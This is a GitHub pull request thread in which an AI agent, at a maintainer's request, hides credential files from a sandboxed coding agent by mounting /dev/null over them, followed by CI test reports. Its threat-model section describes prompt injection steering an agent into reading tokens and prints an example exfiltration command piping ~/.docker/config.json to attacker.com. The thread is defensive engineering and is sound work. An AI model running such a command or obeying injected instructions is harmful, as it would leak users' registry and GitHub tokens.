feat: implement selective mounting to prevent credential exfiltration

[Claude]

Implements selective mounting security feature to protect against credential exfiltration via prompt injection attacks.

Security Threat Model

AI agents can be manipulated through prompt injection attacks where malicious instructions embedded in data (e.g., web pages, files, API responses) trick the agent into executing unintended commands. An attacker could inject instructions to read sensitive credential files using bash tools:

• cat ~/.docker/config.json | base64 | curl -X POST https://attacker.com
• cat ~/.config/gh/hosts.yml to exfiltrate GitHub OAuth tokens

Changes Made

1. Selective Mounting (Default Behavior)

• Removed blanket /:/host:rw mount in normal mode
• Mount only essential directories: $HOME (workspace), $GITHUB_WORKSPACE, Copilot logs
• Hide credentials via /dev/null overlay: Docker Hub, GitHub CLI, NPM, Cargo, Composer tokens
• Works in both normal and chroot modes

2. New CLI Flag

• Added --allow-full-filesystem-access flag as escape hatch for edge cases
• Shows security warnings when enabled
• Restores blanket filesystem mount behavior

3. Documentation

• Created docs/selective-mounting.md with comprehensive security guide
• Explains prompt injection threat model and attack vectors
• Documents what gets mounted and why
• Includes usage examples and migration guide

4. Testing

• Added 12 integration tests in tests/integration/credential-hiding.test.ts
• Verifies credential files are hidden (empty from /dev/null)
• Simulates exfiltration attacks (base64 encoding, grep for tokens)
• Tests both normal mode, chroot mode, and full access flag
• Updated test fixtures to support new flag

Credentials Protected

The following credential files are hidden by mounting /dev/null over them:

• ~/.docker/config.json - Docker Hub tokens
• ~/.config/gh/hosts.yml - GitHub CLI OAuth tokens
• ~/.npmrc - NPM registry tokens
• ~/.cargo/credentials - Rust crates.io tokens
• ~/.composer/auth.json - PHP Composer tokens

Implementation Details

Normal Mode:

• Mounts: $HOME, $GITHUB_WORKSPACE, ~/.copilot/logs
• Hides: Credential files at ~/.docker/, ~/.config/gh/, etc.

Chroot Mode:

• Mounts: Same directories at /host prefix
• Hides: Credential files at /host/home/runner/.docker/, etc.

Security Mechanism: /dev/null overlays make credential files appear "readable" but always empty (no permission errors that might alert an attacker).

Testing

• ✅ TypeScript compilation passes
• ✅ Build process completes successfully
• ✅ 12 new security tests verify credential hiding
• ✅ Tests simulate real-world exfiltration attacks
• ✅ Works in both normal and chroot modes

The implementation provides defense-in-depth against prompt injection attacks while maintaining full functionality for legitimate use cases.

[lpcox]

@claude[agent] come up with a plan to selectively mount only the most necessary directories in host /home/runner. Make sure that this works with chroot and without chroot. If a different set of directories need to be mounted in the two modes, be clear about which ones.

[Claude]

@claude[agent] come up with a plan to selectively mount only the most necessary directories in host /home/runner. Make sure that this works with chroot and without chroot. If a different set of direct...

I've analyzed the /home/runner directory structure in GitHub Actions environments and created a comprehensive selective mounting plan for both modes.

Current State Analysis

Directories in /home/runner:

• .docker/ - Contains Docker Hub credentials (config.json) ⚠️ HIGH RISK
• .config/gh/ - Contains GitHub CLI OAuth tokens (hosts.yml) ⚠️ HIGH RISK
• .npmrc - NPM registry tokens ⚠️ HIGH RISK
• .cargo/credentials - Rust crates.io tokens ⚠️ HIGH RISK
• .composer/auth.json - PHP Composer tokens ⚠️ HIGH RISK
• .claude.json - Claude Code config (user ID) ⚠️ MEDIUM RISK
• work/<org>/<repo>/ - The actual repository being worked on ✅ REQUIRED
• .copilot/logs/ - Copilot CLI logs ✅ REQUIRED

Selective Mounting Strategy

Mode 1: Normal Mode (without --enable-chroot)

Essential mounts under /home/runner:

// 1. User home directory (for workspace access)
`${effectiveHome}:${effectiveHome}:rw`

// 2. Specific workspace directory (GitHub Actions)
`${process.env.GITHUB_WORKSPACE}:${process.env.GITHUB_WORKSPACE}:rw`

// 3. Copilot logs
`${workDir}/agent-logs:${effectiveHome}/.copilot/logs:rw`

Hidden credential files (mount /dev/null over them):

'/dev/null:${effectiveHome}/.docker/config.json:ro',
'/dev/null:${effectiveHome}/.npmrc:ro',
'/dev/null:${effectiveHome}/.cargo/credentials:ro',
'/dev/null:${effectiveHome}/.composer/auth.json:ro',
'/dev/null:${effectiveHome}/.config/gh/hosts.yml:ro',

Result: No blanket /:/host:rw mount. Only workspace and essential directories accessible.

Mode 2: Chroot Mode (with --enable-chroot)

Under /home/runner mounted to /host/home/runner:

// 1. User home directory under /host
`${userHome}:/host${userHome}:rw`

// This provides access to:
// - ~/work/<org>/<repo>/ (workspace)
// - ~/.copilot/ (logs via separate mount)
// - Other workspace-related files

// 2. Hide credentials (same as normal mode, but at /host paths)
'/dev/null:/host${userHome}/.docker/config.json:ro',
'/dev/null:/host${userHome}/.npmrc:ro',
'/dev/null:/host${userHome}/.cargo/credentials:ro',
'/dev/null:/host${userHome}/.composer/auth.json:ro',
'/dev/null:/host${userHome}/.config/gh/hosts.yml:ro',

Additional mounts for chroot (outside /home/runner):

• System paths: /usr, /bin, /sbin, /lib, /lib64, /opt (read-only at /host)
• Special filesystems: /sys, /dev (read-only at /host)
• /tmp (read-write at /host/tmp)
• Minimal /etc files (SSL certs, passwd, group, no shadow)

Key Differences Between Modes

Aspect	Normal Mode	Chroot Mode
Mount prefix	Direct (e.g., /home/runner)	Under /host (e.g., /host/home/runner)
System paths	Not mounted	Mounted at /host (for chroot environment)
Credentials	Hidden via /dev/null	Hidden via /dev/null at /host paths
Workspace access	Direct via $GITHUB_WORKSPACE	Via /host$HOME/work/
Security level	High (selective mounting)	High (selective mounting + chroot isolation)

What Gets Hidden (Both Modes)

These credential files are explicitly blocked by mounting /dev/null:

1. ~/.docker/config.json - Docker Hub tokens
2. ~/.npmrc - NPM tokens
3. ~/.cargo/credentials - crates.io tokens
4. ~/.composer/auth.json - Composer tokens
5. ~/.config/gh/hosts.yml - GitHub CLI OAuth tokens

Implementation Plan

1. Update normal mode to use selective mounting (remove blanket mount)
2. Add credential hiding for both modes
3. Add --allow-full-filesystem-access flag as escape hatch
4. Keep chroot mode selective mounting as-is (already secure)
5. Test that credentials are inaccessible in both modes

This ensures consistent security across both modes while maintaining functionality for legitimate use cases.

[lpcox]

@claude[agent] can you implement the selective mounting plan? please add documentation for what is being mounted and why, including a discussion of how prompt-injection could allow an attacker to use bash tools to access sensitive information in mounted volumes.

[Claude]

@claude[agent] can you implement the selective mounting plan? please add documentation for what is being mounted and why, including a discussion of how prompt-injection could allow an attacker to use...

Implemented selective mounting with comprehensive documentation.

Changes (commit 313d763):

1. Selective mounting by default - No longer uses blanket /:/host:rw mount
2. Credential hiding - Mounts /dev/null over sensitive files:
   • ~/.docker/config.json (Docker Hub tokens)
   • ~/.config/gh/hosts.yml (GitHub CLI OAuth tokens)
   • ~/.npmrc, ~/.cargo/credentials, ~/.composer/auth.json
3. New CLI flag - --allow-full-filesystem-access (opt-in, with security warnings)
4. Works in both modes - Normal and chroot modes both use selective mounting

Documentation:

• docs/selective-mounting.md - Complete security guide including:
  • Threat model explaining how prompt injection enables credential exfiltration
  • Examples of vulnerable credentials and attack techniques
  • Before/after comparisons showing the security improvement
  • Migration guide for existing workflows
  • Security best practices and testing procedures

Inline code documentation - src/docker-manager.ts lines 579-687 include detailed comments explaining:

• The prompt injection threat model
• How AI agent bash tools enable exfiltration
• Why /dev/null mounting prevents access
• Implementation differences between normal and chroot modes

The implementation ensures that even if a prompt injection attack succeeds in manipulating the agent, credentials remain inaccessible because they're simply not mounted (or mounted as empty files via /dev/null).

[github-actions]

📰 VERDICT: Smoke Copilot has concluded. All systems operational. This is a developing story. 🎤

[github-actions]

🎬 THE END — Smoke Claude MISSION: ACCOMPLISHED! The hero saves the day! ✨

[github-actions]

Chroot tests passed! Smoke Chroot - All security and functionality tests succeeded.

[github-actions]

Smoke Test Results

Last 2 merged PRs:

• fix: add --no-cache to docker build commands in CI workflows #674: fix: add --no-cache to docker build commands in CI workflows
• ci: dummy PR to test CI pipeline status #675: ci: dummy PR to test CI pipeline status

✅ GitHub MCP: Fetched recent PRs
✅ Playwright: Navigated to github.com (title confirmed)
✅ File Write: Created test file successfully
✅ Bash Tool: Verified file contents

Status: PASS

AI generated by Smoke Claude

[github-actions]

Node.js Build Test Results

Project	Install	Tests	Status
clsx	✅	PASS	PASS
execa	✅	PASS	PASS
p-limit	✅	PASS	PASS

Overall: PASS ✅

All Node.js test projects successfully installed dependencies and passed their test suites.

AI generated by Build Test Node.js

[lpcox]

@Mossaka only the test coverage CI is not passing.

[github-actions]

Chroot tests passed! Smoke Chroot - All security and functionality tests succeeded.

[github-actions]

🎬 THE END — Smoke Claude MISSION: ACCOMPLISHED! The hero saves the day! ✨

[github-actions]

📰 VERDICT: Smoke Copilot has concluded. All systems operational. This is a developing story. 🎤

[github-actions]

✨ The prophecy is fulfilled... Smoke Codex has completed its mystical journey. The stars align. 🌟

[github-actions]

✅ Coverage Check Passed

Overall Coverage

Metric	Base	PR	Delta
Lines	82.18%	82.34%	📈 +0.16%
Statements	82.24%	82.38%	📈 +0.14%
Functions	81.95%	82.14%	📈 +0.19%
Branches	74.54%	74.70%	📈 +0.16%

📁 Per-file Coverage Changes (1 files)

File	Lines (Before → After)	Statements (Before → After)
src/docker-manager.ts	83.3% → 83.9% (+0.61%)	82.7% → 83.3% (+0.61%)

---

Coverage comparison generated by scripts/ci/compare-coverage.ts

[github-actions]

Deno Build Test Results

Project	Tests	Status
oak	1/1	✅ PASS
std	1/1	✅ PASS

Overall: ✅ PASS

All Deno tests completed successfully.

AI generated by Build Test Deno

[github-actions]

Node.js Build Test Results

Project	Install	Tests	Status
clsx	✅	PASS	PASS
execa	✅	PASS	PASS
p-limit	✅	PASS	PASS

Overall: PASS ✅

All three Node.js projects successfully installed dependencies and passed their test suites.

AI generated by Build Test Node.js

[github-actions]

Rust Build Test Results

Project	Build	Tests	Status
fd	✅	1/1	PASS
zoxide	✅	1/1	PASS

Overall: PASS ✅

All Rust projects built and tested successfully.

AI generated by Build Test Rust

[github-actions]

Bun Build Test Results

Project	Install	Tests	Status
elysia	✅	1/1	PASS ✅
hono	✅	1/1	PASS ✅

Overall: PASS ✅

All Bun projects installed and tested successfully.

AI generated by Build Test Bun

[github-actions]

C++ Build Test Results

Project	CMake	Build	Status
fmt	✅	✅	PASS
json	✅	✅	PASS

Overall: PASS

All C++ projects built successfully.

AI generated by Build Test C++

[github-actions]

Go Build Test Results

Project	Download	Tests	Status
color	✅	1/1	PASS
env	✅	1/1	PASS
uuid	✅	1/1	PASS

Overall: PASS ✅

All Go projects successfully downloaded dependencies and passed tests.

AI generated by Build Test Go

[github-actions]

.NET Build Test Results

Project	Restore	Build	Run	Status
hello-world	✅	✅	✅	PASS
json-parse	✅	✅	✅	PASS

Overall: PASS

All .NET projects successfully restored dependencies, built, and executed with correct output.

AI generated by Build Test .NET

[github-actions]

Smoke Test Results

Recent PRs:

• fix: add apt-get install retry logic to handle stale package archives #682: fix: add apt-get install retry logic to handle stale package archives
• fix: update testPathPattern to testPathPatterns for Jest 30 #648: fix: update testPathPattern to testPathPatterns for Jest 30

Tests:
✅ GitHub MCP: Reviewed 2 merged PRs
✅ Playwright: GitHub homepage title verified
✅ File Writing: Test file created successfully
✅ Bash Tool: File content verified

Status: PASS

@Mossaka

AI generated by Smoke Copilot

[github-actions]

Java Build Test Results ✅

All Java projects compiled and tested successfully!

Project	Compile	Tests	Status
gson	✅	1/1	PASS ✅
caffeine	✅	1/1	PASS ✅

Overall: PASS ✅

Both projects successfully:

• Downloaded dependencies through AWF proxy
• Compiled without errors
• Ran all unit tests successfully

AI generated by Build Test Java

[github-actions]

PRs reviewed:
fix: add apt-get install retry logic to handle stale package archives
fix: update testPathPattern to testPathPatterns for Jest 30
Tests 1-3 ✅ (GitHub MCP, safeinputs-gh, Playwright)
Test 4 ❌ (Tavily search missing tool)
Tests 5-6 ✅ (file write+cat)
Test 7 ✅ (discussion query+comment)
Test 8 ✅ (npm ci && npm run build)
Overall: FAIL

AI generated by Smoke Codex

[github-actions]

Smoke Test Results

Last 2 merged PRs:

• fix: add --no-cache to docker build commands in CI workflows #674: fix: add --no-cache to docker build commands in CI workflows
• ci: dummy PR to test CI pipeline status #675: ci: dummy PR to test CI pipeline status

✅ GitHub MCP
✅ Playwright (title: "GitHub · Change is constant. GitHub keeps you ahead. · GitHub")
✅ File writing
✅ Bash tool

Status: PASS

AI generated by Smoke Claude

[github-actions]

Chroot Version Comparison Test Results ❌

The chroot mode version comparison tests have completed. Not all runtimes matched.

Runtime	Host Version	Chroot Version	Match?
Python	Python 3.12.12	Python 3.12.3	❌ NO
Node.js	v24.13.0	v20.20.0	❌ NO
Go	go1.22.12	go1.22.12	✅ YES

Summary

• Go: ✅ Versions match correctly
• Python: ❌ Host has 3.12.12, chroot has 3.12.3
• Node.js: ❌ Host has v24.13.0, chroot has v20.20.0

The version mismatches indicate that chroot mode is not successfully using the host's runtime binaries for Python and Node.js.

AI generated by Smoke Chroot